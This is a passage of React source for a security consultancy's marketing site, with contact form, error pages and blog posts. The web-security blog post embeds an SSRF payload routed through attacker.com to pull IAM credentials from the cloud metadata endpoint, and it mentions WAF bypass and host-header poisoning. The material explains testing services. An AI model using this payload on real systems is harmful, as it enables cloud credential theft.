          {industries.map((industry) => (
            <div
              key={industry.name}
              className="group p-6 bg-white/[0.02] border border-white/5 hover:border-[#00FF94]/30 hover:bg-[#00FF94]/5 transition-all duration-500 flex flex-col items-center text-center rounded-sm"
            >
              <div className="w-12 h-12 mb-4 flex items-center justify-center bg-white/5 rounded-full group-hover:scale-110 group-hover:text-[#00FF94] transition-transform duration-500 text-slate-400">
                <industry.icon size={24} strokeWidth={1.5} />
              </div>
              <h3 className="text-sm font-bold text-white mb-2 uppercase tracking-wide group-hover:text-[#00FF94] transition-colors">
                {industry.name}
              </h3>
              <p className="text-[10px] text-slate-500 font-mono leading-tight group-hover:text-slate-400">
                {industry.desc}
              </p>
            </div>
          ))}
        </div>
      </div>
    </section>
  );
};

// Testimonials Section
const TestimonialsSection = () => {
  return (
    <section
      id="testimonials"
      className="section-padding bg-[#050505] relative border-t border-white/5"
      data-testid="testimonials-section"
    >
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        <div className="mb-16 animate-fade-in-up text-center">
          <div className="flex items-center justify-center gap-3 mb-4">
            <div className="w-12 h-[2px] bg-[#00FF94]" />
            <span className="text-sm font-mono text-[#00FF94] uppercase tracking-wider">
              Client Feedback
            </span>
            <div className="w-12 h-[2px] bg-[#00FF94]" />
          </div>
          <h2 className="text-3xl md:text-[#00FF94]xl lg:text-5xl font-bold mb-4">
            Trusted by the Best
          </h2>
          <p className="text-slate-400 max-w-2xl mx-auto text-lg leading-relaxed">
            See what enterprise security leaders say about our vulnerability assessments and penetration testing.
          </p>
        </div>

        <div className="grid grid-cols-1 md:grid-cols-3 gap-8">
          {testimonials.map((testimonial, index) => (
            <div
              key={testimonial.id}
              className="card-cyber p-8 animate-fade-in-up flex flex-col relative"
              style={{ animationDelay: `${index * 150}ms` }}
            >
              {/* Quote icon watermark */}
              <div className="absolute top-6 right-6 opacity-5">
                <MessageSquare size={64} className="text-[#00FF94]" />
              </div>

              <div className="mb-6 flex-grow">
                <p className="text-slate-300 italic leading-relaxed text-sm md:text-base relative z-10">
                  "{testimonial.quote}"
                </p>
              </div>

              <div className="mt-auto border-t border-white/10 pt-4 flex flex-col gap-2">
                <div className="flex gap-1 mb-1">
                  {[...Array(testimonial.rating)].map((_, i) => (
                    <Star key={i} size={14} className="fill-[#00FF94] text-[#00FF94]" />
                  ))}
                </div>
                <div>
                  <p className="text-[#00FF94] text-xs font-mono">{testimonial.role}</p>
                  <p className="text-slate-500 text-xs mt-1">{testimonial.company}</p>
                </div>
              </div>
            </div>
          ))}
        </div>

        <p className="text-sm text-slate-500 italic mt-12 text-center opacity-70">
          *Note: Client names and specific details are kept strictly confidential due to Non-Disclosure Agreements (NDA).
        </p>
      </div>
    </section>
  );
};

const ContactSection = () => {
  const [turnstileToken, setTurnstileToken] = useState("");
  const [formData, setFormData] = useState({
    name: "",
    company: "",
    email: "",
    phone: "",
    service_type: "",
    message: "",
  });
  const [isSubmitting, setIsSubmitting] = useState(false);

  const handleChange = (e) => {
    const { name, value } = e.target;
    setFormData((prev) => ({ ...prev, [name]: value }));
  };

  const handleServiceChange = (value) => {
    setFormData((prev) => ({ ...prev, service_type: value }));
  };

  const handleSubmit = async (e) => {
    e.preventDefault();

    if (!turnstileToken) {
      toast.error("Security Verification Required", {
        description: "Please complete the CAPTCHA to proceed.",
      });
      return;
    }

    setIsSubmitting(true);

    try {
      const response = await fetch(EMAIL_API_URL, {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({
          name: formData.name,
          email: formData.email,
          phone: formData.phone,
          company: formData.company,
          service_type: formData.service_type,
          message: formData.message,
          turnstileToken
        }),
      });

      const data = await response.json();

      if (data.success) {
        toast.success("Transmission Successful", {
          description: "Your message has been transmitted securely. Our team will respond within 24 hours.",
        });

        setFormData({
          name: "",
          company: "",
          email: "",
          phone: "",
          service_type: "",
          message: "",
        });
      } else {
        throw new Error(data.error || "Failed to send");
      }
    } catch (error) {
      console.error("Email Error:", error);
      toast.error("Transmission Failed", {
        description: "Please check your connection and try again.",
      });
    } finally {
      setIsSubmitting(false);
    }
  };

  return (
    <section
      id="contact"
      className="section-padding bg-[#0A0A0A] relative"
      data-testid="contact-section"
    >
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        <div className="grid lg:grid-cols-2 gap-16">
          {/* Left - Info */}
          <div className="animate-fade-in-up">
            <div className="flex items-center gap-3 mb-4">
              <div className="w-12 h-[2px] bg-[#00FF94]" />
              <span className="text-sm font-mono text-[#00FF94] uppercase tracking-wider">
                Contact Us
              </span>
            </div>
            <h2 className="text-3xl md:text-[#00FF94]xl lg:text-5xl font-bold mb-6">
              Initiate Secure
              <br />
              <span className="text-slate-500">Communication</span>
            </h2>
            <p className="text-slate-400 text-lg leading-relaxed mb-8">
              Ready to fortify your digital defenses? Our team responds to all
              inquiries within 24 hours. All communications are encrypted and
              handled with the utmost confidentiality.
            </p>

            {/* Contact Info */}
            <div className="space-y-4">
              <div className="flex items-center gap-4">
                <div className="w-12 h-12 bg-white/5 border border-white/10 flex items-center justify-center">
                  <Mail className="w-5 h-5 text-[#00FF94]" />
                </div>
                <div>
                  <p className="text-sm text-slate-500">Email Us</p>
                  <a href="mailto:hello@cyberentcube.com" className="font-semibold hover:text-[#00FF94] transition-colors">
                    hello@cyberentcube.com
                  </a>
                </div>
              </div>
              <div className="flex items-center gap-4">
                <div className="w-12 h-12 bg-white/5 border border-white/10 flex items-center justify-center">
                  <Zap className="w-5 h-5 text-[#00FF94]" />
                </div>
                <div>
                  <p className="text-sm text-slate-500">Response Time</p>
                  <p className="font-semibold">Within 24 Hours</p>
                </div>
              </div>
              <div className="flex items-center gap-4">
                <div className="w-12 h-12 bg-white/5 border border-white/10 flex items-center justify-center">
                  <Lock className="w-5 h-5 text-[#00FF94]" />
                </div>
                <div>
                  <p className="text-sm text-slate-500">Communication</p>
                  <p className="font-semibold">End-to-End Encrypted</p>
                </div>
              </div>
            </div>
          </div>

          {/* Right - Form */}
          <div className="animate-fade-in-up delay-200">
            <div className="terminal-form">
              {/* Terminal Header */}
              <div className="terminal-header">
                <div className="terminal-dot bg-red-500" />
                <div className="terminal-dot bg-yellow-500" />
                <div className="terminal-dot bg-green-500" />
                <span className="text-xs text-slate-500 ml-2 font-mono">
                  secure_transmit.exe
                </span>
              </div>

              {/* Form */}
              <form onSubmit={handleSubmit} className="p-6 space-y-5" data-testid="contact-form">
                <div className="grid grid-cols-1 md:grid-cols-2 gap-5">
                  <div>
                    <label className="block text-xs font-mono text-slate-500 mb-2">
                      NAME*
                    </label>
                    <input
                      type="text"
                      name="name"
                      value={formData.name}
                      onChange={handleChange}
                      required
                      className="input-cyber"
                      placeholder="John Doe"
                      data-testid="contact-name-input"
                    />
                  </div>
                  <div>
                    <label className="block text-xs font-mono text-slate-500 mb-2">
                      COMPANY
                    </label>
                    <input
                      type="text"
                      name="company"
                      value={formData.company}
                      onChange={handleChange}
                      className="input-cyber"
                      placeholder="Acme Corp"
                      data-testid="contact-company-input"
                    />
                  </div>
                </div>
                <div className="grid grid-cols-1 md:grid-cols-2 gap-5">
                  <div>
                    <label className="block text-xs font-mono text-slate-500 mb-2">
                      EMAIL*
                    </label>
                    <input
                      type="email"
                      name="email"
                      value={formData.email}
                      onChange={handleChange}
                      required
                      className="input-cyber"
                      placeholder="john@acme.com"
                      data-testid="contact-email-input"
                    />
                  </div>
                  <div>
                    <label className="block text-xs font-mono text-slate-500 mb-2">
                      PHONE NUMBER
                    </label>
                    <input
                      type="tel"
                      name="phone"
                      value={formData.phone}
                      onChange={handleChange}
                      className="input-cyber"
                      placeholder="+1 (555) 000-0000"
                      data-testid="contact-phone-input"
                    />
                  </div>
                </div>

                <div>
                  <label className="block text-xs font-mono text-slate-500 mb-2">
                    SERVICE TYPE*
                  </label>
                  <Select
                    value={formData.service_type}
                    onValueChange={handleServiceChange}
                    required
                  >
                    <SelectTrigger
                      className="w-full bg-white/[0.03] border-white/10 text-white hover:border-[#00FF94] focus:border-[#00FF94] focus:ring-1 focus:ring-[#00FF94] h-12"
                      data-testid="contact-service-select"
                    >
                      <SelectValue placeholder="Select a service" />
                    </SelectTrigger>
                    <SelectContent className="bg-[#0A0A0A] border-white/10">
                      <SelectItem value="web" className="text-white hover:bg-white/10">
                        Web Application VAPT
                      </SelectItem>
                      <SelectItem value="mobile" className="text-white hover:bg-white/10">
                        Mobile Application VAPT
                      </SelectItem>
                      <SelectItem value="network" className="text-white hover:bg-white/10">
                        Infrastructure & Network VAPT
                      </SelectItem>
                      <SelectItem value="thick" className="text-white hover:bg-white/10">
                        Thick Client VAPT
                      </SelectItem>
                      <SelectItem value="api" className="text-white hover:bg-white/10">
                        API Security Testing
                      </SelectItem>
                      <SelectItem value="grc" className="text-white hover:bg-white/10">
                        GRC Auditing
                      </SelectItem>
                      <SelectItem value="llm" className="text-white hover:bg-white/10">
                        LLM Security Testing
                      </SelectItem>
                      <SelectItem value="multiple" className="text-white hover:bg-white/10">
                        Multiple Services
                      </SelectItem>
                    </SelectContent>
                  </Select>
                </div>

                <div>
                  <label className="block text-xs font-mono text-slate-500 mb-2">
                    MESSAGE*
                  </label>
                  <textarea
                    name="message"
                    value={formData.message}
                    onChange={handleChange}
                    required
                    rows={4}
                    className="input-cyber resize-none"
                    placeholder="Describe your security assessment needs..."
                    data-testid="contact-message-input"
                  />
                </div>

                <div className="mb-6">
                  <Turnstile
                    siteKey={process.env.TURNSTILE_SITE_KEY || ""}
                    onSuccess={(token) => setTurnstileToken(token)}
                    onExpire={() => setTurnstileToken("")}
                    onError={() => setTurnstileToken("")}
                    options={{
                      theme: 'dark',
                    }}
                  />
                </div>

                <button
                  type="submit"
                  disabled={isSubmitting}
                  className="btn-cyber w-full flex items-center justify-center gap-2 disabled:opacity-50"
                  data-testid="contact-submit-btn"
                >
                  {isSubmitting ? (
                    <>
                      <div className="w-4 h-4 border-2 border-black/30 border-t-black rounded-full animate-spin" />
                      Transmitting...
                    </>
                  ) : (
                    <>
                      <Send size={18} />
                      Transmit Securely
                    </>
                  )}
                </button>
              </form>
            </div>
          </div>
        </div>
      </div >
    </section >
  );
};

// Footer
const Footer = () => {
  const navigate = useNavigate();
  const currentYear = new Date().getFullYear();

  const handleGlobalNav = (sectionId) => {
    if (window.location.pathname !== "/") {
      navigate("/", { state: { scrollTo: sectionId } });
    } else {
      const element = document.getElementById(sectionId);
      if (element) {
        element.scrollIntoView({ behavior: "smooth" });
      }
    }
  };

  return (
    <footer className="bg-[#050505] border-t border-white/10 py-12" data-testid="footer">
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        <div className="grid grid-cols-1 md:grid-cols-5 gap-8 mb-12 items-start">
          {/* Brand */}
          <div className="md:col-span-2">
            <div className="flex items-center mb-6">
              <CyberentLogo width={220} height={70} />
            </div>
            <p className="text-slate-500 text-sm max-w-sm mb-4">
              Exponential Security. Zero Compromise. Elite VAPT services for
              enterprises that demand excellence.
            </p>
            <p className="text-slate-400 text-sm mb-2">
              <a href="mailto:hello@cyberentcube.com" className="hover:text-[#00FF94] transition-colors">
                hello@cyberentcube.com
              </a>
            </p>
            <div className="flex items-center gap-2 mb-6">
              <div className="status-dot" />
              <span className="text-xs font-mono text-slate-500">
                All systems operational
              </span>
            </div>
          </div>

          {/* Services 1 */}
          <div>
            <h4 className="font-semibold mb-4 text-sm uppercase tracking-wider">
              Core Services
            </h4>
            <ul className="space-y-2">
              <li>
                <button onClick={() => handleGlobalNav("services")} className="footer-link text-left">
                  Web Application VAPT
                </button>
              </li>
              <li>
                <button onClick={() => handleGlobalNav("services")} className="footer-link text-left">
                  Mobile Application VAPT
                </button>
              </li>
              <li>
                <button onClick={() => handleGlobalNav("services")} className="footer-link text-left">
                  Network VAPT
                </button>
              </li>
            </ul>
          </div>

          {/* Services 2 */}
          <div>
            <h4 className="font-semibold mb-4 text-sm uppercase tracking-wider">
              Advanced Security
            </h4>
            <ul className="space-y-2">
              <li>
                <button onClick={() => handleGlobalNav("services")} className="footer-link text-left">
                  API Security
                </button>
              </li>
              <li>
                <button onClick={() => handleGlobalNav("services")} className="footer-link text-left">
                  GRC auditing
                </button>
              </li>
              <li>
                <button onClick={() => handleGlobalNav("services")} className="footer-link text-left">
                  LLM Testing
                </button>
              </li>
            </ul>
          </div>

          {/* Company */}
          <div>
            <h4 className="font-semibold mb-4 text-sm uppercase tracking-wider">
              Company
            </h4>
            <ul className="space-y-2">
              <li>
                <button onClick={() => handleGlobalNav("about")} className="footer-link text-left">
                  About Us
                </button>
              </li>
              <li>
                <button
                  onClick={() => navigate("/blog")}
                  className="footer-link text-left w-full"
                >
                  Blog
                </button>
              </li>
              <li>
                <button onClick={() => handleGlobalNav("contact")} className="footer-link text-left">
                  Contact
                </button>
              </li>
              <li>
                <button onClick={() => navigate("/privacy")} className="footer-link text-left">
                  Privacy Policy
                </button>
              </li>
            </ul>
          </div>
        </div>

        {/* Bottom */}
        <div className="pt-8 border-t border-white/10 flex flex-col md:flex-row justify-between items-center gap-6">
          <p className="text-slate-600 text-sm">
            © {currentYear} Cyberent³. All rights reserved.
          </p>

          <div className="flex items-center gap-6">
            <a
              href="https://www.linkedin.com/company/cyberent-cube-dot-com"
              target="_blank"
              rel="noopener noreferrer"
              className="text-slate-500 hover:text-[#00FF94] transition-all duration-300 transform hover:scale-110"
              title="LinkedIn"
            >
              <Linkedin size={18} />
            </a>
            <a
              href="mailto:hello@cyberentcube.com"
              className="text-slate-500 hover:text-[#00FF94] transition-all duration-300 transform hover:scale-110"
              title="Email Us"
            >
              <Mail size={18} />
            </a>
          </div>

          <p className="text-xs font-mono text-slate-700">
            Securing the digital frontier since 2022
          </p>
        </div>
      </div>
    </footer>
  );
};

const SSLBadge = () => (
  <div className="fixed bottom-24 right-6 z-40" data-testid="ssl-badge">
    <div className="glass px-4 py-2 flex items-center gap-2 animate-fade-in-up">
      <Lock className="w-4 h-4 text-[#00FF94]" />
      <div className="text-xs">
        <p className="text-[#00FF94] font-semibold">SSL Secured</p>
        <p className="text-slate-500">256-bit Encryption</p>
      </div>
    </div>
  </div>
);

// Loading Bar Component
const LoadingBar = () => {
  const [progress, setProgress] = useState(0);
  const [isVisible, setIsVisible] = useState(false);
  const location = useLocation();

  useEffect(() => {
    setIsVisible(true);
    setProgress(0);

    // Initial jump
    const jump = setTimeout(() => setProgress(15), 50);

    const interval = setInterval(() => {
      setProgress(prev => {
        if (prev >= 90) {
          clearInterval(interval);
          return 90;
        }
        return prev + Math.random() * 5;
      });
    }, 200);

    return () => {
      clearTimeout(jump);
      clearInterval(interval);
    };
  }, [location]);

  useEffect(() => {
    if (progress >= 90) {
      const finish = setTimeout(() => {
        setProgress(100);
        setTimeout(() => setIsVisible(false), 400);
      }, 200);
      return () => clearTimeout(finish);
    }
  }, [progress]);

  if (!isVisible) return null;

  return (
    <div className="fixed top-0 left-0 right-0 z-[100] h-[3px] pointer-events-none">
      <div
        className="h-full bg-[#00FF94] shadow-[0_0_15px_rgba(0,255,148,0.8)] transition-all duration-500 ease-out"
        style={{ width: `${progress}%` }}
      />
    </div>
  );
};

// 404 Not Found Page
const NotFoundPage = () => {
  const navigate = useNavigate();

  return (
    <div className="min-h-screen bg-[#050505] flex items-center px-4 md:px-12 grid-bg" data-testid="404-page">
      <div className="noise-overlay" />
      <div className="relative z-10 w-full max-w-3xl animate-fade-in-up">
        <div className="flex items-center gap-3 mb-6">
          <div className="w-12 h-[2px] bg-[#00FF94]" />
          <span className="text-sm font-mono text-[#00FF94] uppercase tracking-widest">
            System Alert
          </span>
        </div>

        <h1 className="text-5xl md:text-6xl font-bold text-white mb-2 leading-tight">
          Resource <br /> <span className="text-slate-500">Not Found.</span>
        </h1>

        <p className="text-slate-400 mt-6 mb-10 text-lg max-w-xl">
          The requested endpoint or path is invalid or has been relocated. This access attempt has been permanently logged.
        </p>

        <div className="font-mono text-xs md:text-sm text-slate-500 mb-10 p-5 bg-white/[0.02] border border-white/10 rounded-sm">
          <div className="flex justify-between items-center border-b border-white/10 pb-2 mb-3">
            <span className="text-white">DIAGNOSTIC_DATA</span>
            <span className="animate-pulse">_</span>
          </div>
          <p className="uppercase"><span className="text-slate-600">ERR_CODE_</span> 404</p>
          <p className="uppercase"><span className="text-slate-600">TIMESTAMP_</span> {new Date().toISOString()}</p>
          <p className="uppercase"><span className="text-slate-600">STATUS___</span> CONNECTION_REFUSED</p>
        </div>

        <div className="flex flex-wrap gap-4">
          <button
            onClick={() => navigate("/")}
            className="btn-cyber flex items-center gap-2"
            data-testid="404-home-btn"
          >
            <Home size={16} />
            Return to Base
          </button>
          <button
            onClick={() => window.history.back()}
            className="btn-outline flex items-center gap-2"
            data-testid="404-back-btn"
          >
            <ArrowRight size={16} className="rotate-180" />
            Previous Node
          </button>
        </div>
      </div>
    </div>
  );
};

// 500 Server Error Page
const ServerErrorPage = () => {
  const navigate = useNavigate();

  return (
    <div className="min-h-screen bg-[#050505] flex items-center px-4 md:px-12 grid-bg" data-testid="500-page">
      <div className="noise-overlay" />
      <div className="relative z-10 w-full max-w-3xl animate-fade-in-up">
        <div className="flex items-center gap-3 mb-6">
          <div className="w-12 h-[2px] bg-red-500" />
          <span className="text-sm font-mono text-red-500 uppercase tracking-widest">
            Critical Fault
          </span>
        </div>

        <h1 className="text-5xl md:text-6xl font-bold text-white mb-2 leading-tight">
          Internal <br /> <span className="text-red-500/80">Server Error.</span>
        </h1>

        <p className="text-slate-400 mt-6 mb-10 text-lg max-w-xl">
          An unexpected exception has occurred at the core layer. The system state has been preserved and our security engineers notified.
        </p>

        <div className="font-mono text-xs md:text-sm text-slate-500 mb-10 p-5 bg-white/[0.02] border border-red-500/20 rounded-sm">
          <div className="flex justify-between items-center border-b border-white/10 pb-2 mb-3">
            <span className="text-white">FAULT_TRACE</span>
            <span className="animate-pulse text-red-500">_</span>
          </div>
          <p className="uppercase"><span className="text-slate-600">ERR_CODE_</span> 500</p>
          <p className="uppercase"><span className="text-slate-600">TIMESTAMP_</span> {new Date().toISOString()}</p>
          <p className="uppercase"><span className="text-slate-600">STATUS___</span> EXECUTION_HALTED</p>
        </div>

        <div className="flex flex-wrap gap-4">
          <button
            onClick={() => window.location.reload()}
            className="btn-cyber flex items-center gap-2 !border-red-500/50 !text-red-400 hover:!bg-red-500/10"
            data-testid="500-retry-btn"
          >
            <RefreshCw size={16} />
            Re-Initialize
          </button>
          <button
            onClick={() => navigate("/")}
            className="btn-outline flex items-center gap-2"
            data-testid="500-home-btn"
          >
            <Home size={16} />
            Return to Base
          </button>
        </div>
      </div>
    </div>
  );
};

// 403 Forbidden Page
const ForbiddenPage = () => {
  const navigate = useNavigate();

  return (
    <div className="min-h-screen bg-[#050505] flex items-center px-4 md:px-12 grid-bg" data-testid="403-page">
      <div className="noise-overlay" />
      <div className="relative z-10 w-full max-w-3xl animate-fade-in-up">
        <div className="flex items-center gap-3 mb-6">
          <div className="w-12 h-[2px] bg-yellow-500" />
          <span className="text-sm font-mono text-yellow-500 uppercase tracking-widest">
            Security Violation
          </span>
        </div>

        <h1 className="text-5xl md:text-6xl font-bold text-white mb-2 leading-tight">
          Access <br /> <span className="text-yellow-500/80">Forbidden.</span>
        </h1>

        <p className="text-slate-400 mt-6 mb-10 text-lg max-w-xl">
          You lack the required credentials to access this secure zone. Unauthorized traversal attempts are monitored and recorded.
        </p>

        <div className="font-mono text-xs md:text-sm text-slate-500 mb-10 p-5 bg-white/[0.02] border border-yellow-500/20 rounded-sm">
          <div className="flex justify-between items-center border-b border-white/10 pb-2 mb-3">
            <span className="text-white">ACCESS_LOG</span>
            <span className="animate-pulse text-yellow-500">_</span>
          </div>
          <p className="uppercase"><span className="text-slate-600">ERR_CODE_</span> 403</p>
          <p className="uppercase"><span className="text-slate-600">TIMESTAMP_</span> {new Date().toISOString()}</p>
          <p className="uppercase"><span className="text-slate-600">STATUS___</span> PERMISSION_DENIED</p>
        </div>

        <div className="flex flex-wrap gap-4">
          <button
            onClick={() => navigate("/")}
            className="btn-cyber flex items-center gap-2 !border-yellow-500/50 !text-yellow-400 hover:!bg-yellow-500/10"
            data-testid="403-home-btn"
          >
            <Home size={16} />
            Evacuate Zone
          </button>
        </div>
      </div>
    </div>
  );
};

// Offline/Network Error Page
const OfflinePage = () => {
  return (
    <div className="min-h-screen bg-[#050505] flex items-center px-4 md:px-12 grid-bg" data-testid="offline-page">
      <div className="noise-overlay" />
      <div className="relative z-10 w-full max-w-3xl animate-fade-in-up">
        <div className="flex items-center gap-3 mb-6">
          <div className="w-12 h-[2px] bg-slate-500" />
          <span className="text-sm font-mono text-slate-500 uppercase tracking-widest">
            Uplink Severed
          </span>
        </div>

        <h1 className="text-5xl md:text-6xl font-bold text-white mb-2 leading-tight">
          Connection <br /> <span className="text-slate-500">Lost.</span>
        </h1>

        <p className="text-slate-400 mt-6 mb-10 text-lg max-w-xl">
          Data transmission has failed. Please verify your local network configuration and routing before attempting to reconnect.
        </p>

        <div className="font-mono text-xs md:text-sm text-slate-500 mb-10 p-5 bg-white/[0.02] border border-white/10 rounded-sm">
          <div className="flex justify-between items-center border-b border-white/10 pb-2 mb-3">
            <span className="text-white">LINK_STATUS</span>
            <span className="animate-pulse">_</span>
          </div>
          <p className="uppercase"><span className="text-slate-600">ERR_CODE_</span> OFFLINE</p>
          <p className="uppercase"><span className="text-slate-600">TIMESTAMP_</span> {new Date().toISOString()}</p>
          <p className="uppercase"><span className="text-slate-600">STATUS___</span> SIGNAL_DROPPED</p>
        </div>

        <div className="flex flex-wrap gap-4">
          <button
            onClick={() => window.location.reload()}
            className="btn-cyber flex items-center gap-2"
            data-testid="offline-retry-btn"
          >
            <RefreshCw size={16} />
            Ping Server
          </button>
        </div>
      </div>
    </div>
  );
};

// Blog Page Component
const BlogPage = () => {
  const navigate = useNavigate();
  const [selectedPost, setSelectedPost] = useState(null);

  const blogPosts = [
    {
      id: 1,
      title: "Advanced Web Application Penetration Testing",
      date: "2024-03-05",
      category: "Web Security",
      excerpt: "Deep dive into complex business logic flaws and race conditions in modern microservices architectures.",
      readTime: "8 min read",
      content: (
        <div className="space-y-8">
          <p>Modern web applications have evolved from simple monolithic structures into complex networks of microservices. While this evolution has improved scalability, it has also introduced sophisticated attack surfaces—most notably in business logic and inter-service communication.</p>

          <div className="relative group overflow-hidden border border-white/10 rounded-sm">
            <img
              src="/assets/blog/web_security_microservices.png"
              alt="Microservices Security Mesh"
              className="w-full h-auto grayscale group-hover:grayscale-0 transition-all duration-700"
            />
            <div className="absolute inset-0 bg-gradient-to-t from-[#050505] to-transparent opacity-60" />
            <div className="absolute bottom-4 left-4 font-mono text-[10px] text-[#00FF94]">
              // FIG_01: MICROSERVICES_ATTACK_SURFACE_ANALYSIS
            </div>
          </div>

          <div className="bg-white/[0.03] border border-white/10 p-6 rounded-sm font-mono text-sm leading-relaxed">
            <h4 className="text-[#00FF94] mb-4">// Case Study: HTTP/2 Rapid Reset & Multiplexing</h4>
            <p className="text-slate-400 mb-4">During a recent premium assessment of a Tier-1 financial service, we identified an exploitation vector involving HTTP/2 frame manipulation. By crafting custom HEADERS and RST_STREAM frames, we could bypass traditional rate-limiting proxies that only tracked connection states rather than stream-level intent.</p>
            <div className="text-[#00FF94] opacity-80">
              [ANALYSIS]: Stream ID collision allowed for data leakage between concurrent user sessions.
            </div>
          </div>

          <h3 className="text-2xl font-bold text-white mt-12">Vulnerability Severity Distribution</h3>
          <div className="space-y-4 p-6 bg-white/[0.02] border border-white/5">
            {[
              { label: "Broken Access Control", value: "94%" },
              { label: "Cryptographic Failures", value: "88%" },
              { label: "Injection (SQLi, XSS)", value: "72%" },
              { label: "Insecure Design", value: "65%" }
            ].map((stat, i) => (
              <div key={i} className="space-y-1">
                <div className="flex justify-between text-[10px] font-mono uppercase tracking-widest text-slate-500">
                  <span>{stat.label}</span>
                  <span>{stat.value}</span>
                </div>
                <div className="h-1 bg-white/5 overflow-hidden">
                  <div
                    className="h-full bg-[#00FF94] transition-all duration-1000"
                    style={{ width: stat.value }}
                  />
                </div>
              </div>
            ))}
          </div>

          <h3 className="text-2xl font-bold text-white mt-12">Exploiting SSRF in Cloud-Native Environments</h3>
          <p>Server-Side Request Forgery is no longer just about hitting `localhost:8080`. In modern architectures, it's the gateway to the internal metadata service (IMDS). We leverage sophisticated payloads to exfiltrate temporary IAM credentials from `169.254.169.254`.</p>

          <div className="bg-[#050505] border border-[#00FF94]/20 p-4 font-mono text-xs text-slate-500 overflow-x-auto">
            {"# Payload: URL-encoded SSRF via Redirect Chain\nGET /v1/api/proxy?url=http://attacker.com/redirect?to=http://169.254.169.254/latest/meta-data/iam/security-credentials/"}
          </div>

          <h3 className="text-2xl font-bold text-white mt-12">The Shift to IDOR 2.0</h3>
          <p>Traditional IDOR has matured. We no longer just look for `user_id=100`. Modern IDOR involves identifying how objects are referenced across different service contexts (e.g., GraphQL shadow schemas or secondary database indexes). Mapping these relationships is the key to elite web pentesting.</p>

          <ul className="list-none space-y-4">
            <li className="flex items-start gap-3 text-slate-400">
              <Zap className="text-[#00FF94] mt-1 flex-shrink-0" size={16} />
              <span>Identifying hidden API endpoints via JS source map analysis and environment variable leaks.</span>
            </li>
            <li className="flex items-start gap-3 text-slate-400">
              <Zap className="text-[#00FF94] mt-1 flex-shrink-0" size={16} />
              <span>Exploiting blind SSRF in internal PDF generation engines using OOB (Out-of-Band) techniques.</span>
            </li>
            <li className="flex items-start gap-3 text-slate-400">
              <Zap className="text-[#00FF94] mt-1 flex-shrink-0" size={16} />
              <span>Bypassing WAFs with non-standard character encoding and HTTP Parameter Pollution (HPP).</span>
            </li>
          </ul>
        </div>
      )
    },
    {
      id: 2,
      title: "Automated vs Manual Pentesting",
      date: "2024-02-28",
      category: "Methodology",
      excerpt: "Why traditional automated scans fail to capture the nuances of a sophisticated adversary's mindset.",
      readTime: "12 min read",
      content: (
        <div className="space-y-8">
          <p>Compliance is not security. Many organizations rely on automated vulnerability scanners to check a box for regulatory requirements (SOC2, PCI-DSS). However, automation follows pre-defined patterns—adversaries are reactive, creative, and persistent.</p>

          <div className="relative border-y border-white/5 py-12 flex flex-col items-center">
            <img
              src="/assets/blog/pentest_phases.png"
              alt="Pentest Operational Phases"
              className="max-w-2xl w-full h-auto opacity-80"
            />
            <div className="mt-8 grid grid-cols-5 w-full max-w-2xl gap-2 font-mono text-[8px] text-center text-slate-500">
              <span>[PHASE_01] RECON</span>
              <span>[PHASE_02] SCAN</span>
              <span>[PHASE_03] EXPLOIT</span>
              <span>[PHASE_04] MAINTAIN</span>
              <span>[PHASE_05] REPORT</span>
            </div>
          </div>

          <h3 className="text-2xl font-bold text-white mt-12">The Human Element: Adversary Simulation</h3>
          <p>A manual penetration test is an exploration of the unknown. It requires the ability to chain multiple "low" severity findings into a "critical" breach scenario. Scan tools often miss the business logic that makes a feature vulnerable. For example, a scanner can't understand if a "Password Reset" flow can be manipulated via "Host Header Poisoning" to send recovery tokens to an attacker's domain.</p>

          <div className="bg-white/[0.03] border border-white/10 p-6 rounded-sm font-mono text-sm leading-relaxed">
            <h4 className="text-[#00FF94] mb-2">// ADVANCED_POST_EXPLOTATION</h4>
            <p className="text-slate-400">Once initial access is gained, the difference between a scan and a human becomes stark. We perform internal network pivot analysis—moving from a vulnerable web-app to the internal database layer using lateral movement techniques that no automated scanner can replicate.</p>
          </div>

          <div className="grid md:grid-cols-2 gap-6 mt-12">
            <div className="p-6 bg-[#00FF94]/5 border border-[#00FF94]/20 relative">
              <div className="absolute top-0 right-0 w-8 h-8 flex items-center justify-center opacity-20">
                <Target className="text-[#00FF94]" />
              </div>
              <h4 className="font-bold mb-4 uppercase tracking-wider text-xs text-[#00FF94]">Automated Scans</h4>
              <ul className="text-sm text-slate-400 space-y-3">
                <li className="flex gap-2"><span>[01]</span> Rapid static analysis of known CVEs</li>
                <li className="flex gap-2"><span>[02]</span> High noise and false-positive rates</li>
                <li className="flex gap-3"><span>[03]</span> Static payloads with zero context</li>
                <li className="flex gap-3"><span>[04]</span> Blocked easily by modern WAFs</li>
              </ul>
            </div>
            <div className="p-6 bg-white/[0.03] border border-white/10 relative">
              <div className="absolute top-0 right-0 w-8 h-8 flex items-center justify-center opacity-20">
                <Brain className="text-white" />
              </div>
              <h4 className="font-bold mb-4 uppercase tracking-wider text-xs">Manual assessments</h4>
              <ul className="text-sm text-slate-400 space-y-3">
                <li className="flex gap-2"><span>[01]</span> Deep business logic validation</li>
                <li className="flex gap-2"><span>[02]</span> Zero false-positive intelligence</li>
                <li className="flex gap-3"><span>[03]</span> Chained vulnerability exploitation</li>
                <li className="flex gap-3"><span>[04]</span> Evasive techniques & stealth</li>
              </ul>
            </div>
          </div>
        </div >
      )
    },
    {
      id: 3,
      title: "Securing Large Language Models (LLMs)",
      date: "2024-02-15",
      category: "AI Security",
      excerpt: "Exploring the new frontier: Prompt injection, data poisoning, and adversarial attacks on enterprise AI.",
      readTime: "15 min read",
      content: (
        <div className="space-y-8">
          <p>As LLMs become integrated into enterprise workflows (Customer Support, Code Generation, Data Analysis), they introduce a new category of vulnerabilities. Prompt injection isn't just a parlor trick—it's the AI equivalent of SQL injection.</p>

          <div className="grid md:grid-cols-2 gap-12 items-center py-8">
            <div className="relative aspect-square">
              <div className="absolute inset-0 rounded-full border-4 border-white/5" />
              <div className="absolute inset-0 rounded-full border-t-4 border-[#00FF94] rotate-45" />
              <div className="absolute inset-0 flex flex-col items-center justify-center font-mono">
                <span className="text-2xl font-bold text-[#00FF94]">65%</span>
                <span className="text-[10px] text-slate-500 uppercase">Input Poisoning</span>
              </div>
            </div>
            <div className="space-y-4">
